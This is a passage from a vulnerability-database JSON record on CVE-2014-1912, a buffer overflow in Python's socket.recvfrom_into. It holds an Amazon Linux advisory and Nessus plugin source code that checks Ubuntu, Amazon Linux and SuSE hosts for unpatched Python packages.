"OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26", "operator": "lt"}], "description": "**Issue Overview:**\n\nBuffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string. \n\n \n**Affected Packages:** \n\n\npython26\n\n \n**Issue Correction:** \nRun _yum update python26_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python26-devel-2.6.9-1.43.amzn1.i686 \n python26-libs-2.6.9-1.43.amzn1.i686 \n python26-debuginfo-2.6.9-1.43.amzn1.i686 \n python26-2.6.9-1.43.amzn1.i686 \n python26-test-2.6.9-1.43.amzn1.i686 \n python26-tools-2.6.9-1.43.amzn1.i686 \n \n src: \n python26-2.6.9-1.43.amzn1.src \n \n x86_64: \n python26-devel-2.6.9-1.43.amzn1.x86_64 \n python26-2.6.9-1.43.amzn1.x86_64 \n python26-test-2.6.9-1.43.amzn1.x86_64 \n python26-debuginfo-2.6.9-1.43.amzn1.x86_64 \n python26-tools-2.6.9-1.43.amzn1.x86_64 \n python26-libs-2.6.9-1.43.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-16T22:33:00", "title": "Medium: python26", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:18", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "modified": "2014-09-16T22:33:00", "id": "ALAS-2014-292", "href": "https://alas.aws.amazon.com/ALAS-2014-292.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:18:04", "references": ["https://usn.ubuntu.com/2125-1/"], "pluginID": "72798", "description": "Ryan Smith-Roberts discovered that Python incorrectly handled buffer\nsizes when using the socket.recvfrom_into() function. An attacker\ncould possibly use this issue to cause Python to crash, resulting in\ndenial of service, or possibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 8, "reporter": "Tenable", "published": "2014-03-04T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 12.10 / 13.10 : python2.6, python2.7, python3.2, python3.3 vulnerability (USN-2125-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-12-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python3.3-minimal", "cpe:/o:canonical:ubuntu_linux:13.10", "p-cpe:/a:canonical:ubuntu_linux:python2.7", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:python2.6", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:python2.6-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.3", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal"], "id": "UBUNTU_USN-2125-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72798", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2125-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72798);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/01 15:12:38\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"USN\", value:\"2125-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 12.10 / 13.10 : python2.6, python2.7, python3.2, python3.3 vulnerability (USN-2125-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ryan Smith-Roberts discovered that Python incorrectly handled buffer\nsizes when using the socket.recvfrom_into() function. An attacker\ncould possibly use this issue to cause Python to crash, resulting in\ndenial of service, or possibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2125-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.6-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.3-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04|12\\.04|12\\.10|13\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 12.10 / 13.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python2.6\", pkgver:\"2.6.5-1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python2.6-minimal\", pkgver:\"2.6.5-1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python2.7\", pkgver:\"2.7.3-5ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-5ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python3.2\", pkgver:\"3.2.3-6ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-6ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python3.3\", pkgver:\"3.3.0-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"python3.3-minimal\", pkgver:\"3.3.0-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"python2.7\", pkgver:\"2.7.5-8ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.5-8ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"python3.3\", pkgver:\"3.3.2-7ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"python3.3-minimal\", pkgver:\"3.3.2-7ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.6 / python2.6-minimal / python2.7 / python2.7-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:04", "references": ["https://alas.aws.amazon.com/ALAS-2014-292.html"], "pluginID": "72748", "description": "Buffer overflow in the socket.recvfrom_into function in\nModules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4,\nand 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary\ncode via a crafted string.", "edition": 8, "reporter": "Tenable", "published": "2014-03-02T00:00:00", "title": "Amazon Linux AMI : python26 (ALAS-2014-292)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-08-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python26-debuginfo", "p-cpe:/a:amazon:linux:python26", "p-cpe:/a:amazon:linux:python26-libs", "p-cpe:/a:amazon:linux:python26-test", "p-cpe:/a:amazon:linux:python26-tools", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:python26-devel"], "id": "ALA_ALAS-2014-292.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72748", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-292.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72748);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/08/02 16:41:58\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_xref(name:\"ALAS\", value:\"2014-292\");\n\n script_name(english:\"Amazon Linux AMI : python26 (ALAS-2014-292)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow in the socket.recvfrom_into function in\nModules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4,\nand 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary\ncode via a crafted string.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-292.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python26' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python26-2.6.9-1.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-debuginfo-2.6.9-1.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-devel-2.6.9-1.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-libs-2.6.9-1.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-test-2.6.9-1.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-tools-2.6.9-1.43.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python26 / python26-debuginfo / python26-devel / python26-libs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:04", "references": ["https://alas.aws.amazon.com/ALAS-2014-293.html"], "pluginID": "72749", "description": "Buffer overflow in the socket.recvfrom_into function in\nModules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4,\nand 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary\ncode via a crafted string.", "edition": 8, "reporter": "Tenable", "published": "2014-03-02T00:00:00", "title": "Amazon Linux AMI : python27 (ALAS-2014-293)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-08-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python27-libs", "p-cpe:/a:amazon:linux:python27", "p-cpe:/a:amazon:linux:python27-test", "p-cpe:/a:amazon:linux:python27-debuginfo", "p-cpe:/a:amazon:linux:python27-devel", "p-cpe:/a:amazon:linux:python27-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-293.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-293.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72749);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/08/02 16:41:58\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_xref(name:\"ALAS\", value:\"2014-293\");\n\n script_name(english:\"Amazon Linux AMI : python27 (ALAS-2014-293)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow in the socket.recvfrom_into function in\nModules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4,\nand 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary\ncode via a crafted string.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-293.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python27' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python27-2.7.5-11.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-debuginfo-2.7.5-11.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-devel-2.7.5-11.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-libs-2.7.5-11.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-test-2.7.5-11.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-tools-2.7.5-11.32.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python27 / python27-debuginfo / python27-devel / python27-libs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:19", "references": ["http://support.novell.com/security/cve/CVE-2014-1912.html", "https://bugzilla.novell.com/show_bug.cgi?id=863741"], "pluginID": "73751", "description": "Python was updated to fix a security issue in the socket.recvfrom_into\nfunction, where data could be written over the end of the buffer.\n(CVE-2014-1912)", "edition": 7, "reporter": "Tenable", "published": "2014-04-29T00:00:00", "title": "SuSE 11.3 Security Update : Python (SAT Patch Number 9075)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-08-03T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:python", "p-cpe:/a:novell:suse_linux:11:python-demo", "p-cpe:/a:novell:suse_linux:11:libpython2_6-1_0", "p-cpe:/a:novell:suse_linux:11:python-tk", "p-cpe:/a:novell:suse_linux:11:python-base-32bit", "p-cpe:/a:novell:suse_linux:11:libpython2_6-1_0-32bit", "p-cpe:/a:novell:suse_linux:11:python-curses", "p-cpe:/a:novell:suse_linux:11:python-doc", "p-cpe:/a:novell:suse_linux:11:python-doc-pdf", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:python-devel", "p-cpe:/a:novell:suse_linux:11:python-base", "p-cpe:/a:novell:suse_linux:11:python-gdbm", "p-cpe:/a:novell:suse_linux:11:python-idle", "p-cpe:/a:novell:suse_linux:11:python-xml", "p-cpe:/a:novell:suse_linux:11:python-32bit"], "id": "SUSE_11_PYTHON-201403-140331.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73751);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-1912\");\n\n script_name(english:\"SuSE 11.3 Security Update : Python (SAT Patch Number 9075)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Python was updated to fix a security issue in the socket.recvfrom_into\nfunction, where data could be written over the end of the buffer.\n(CVE-2014-1912)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=863741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-1912.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9075.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libpython2_6-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libpython2_6-1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-gdbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:python-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libpython2_6-1_0-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 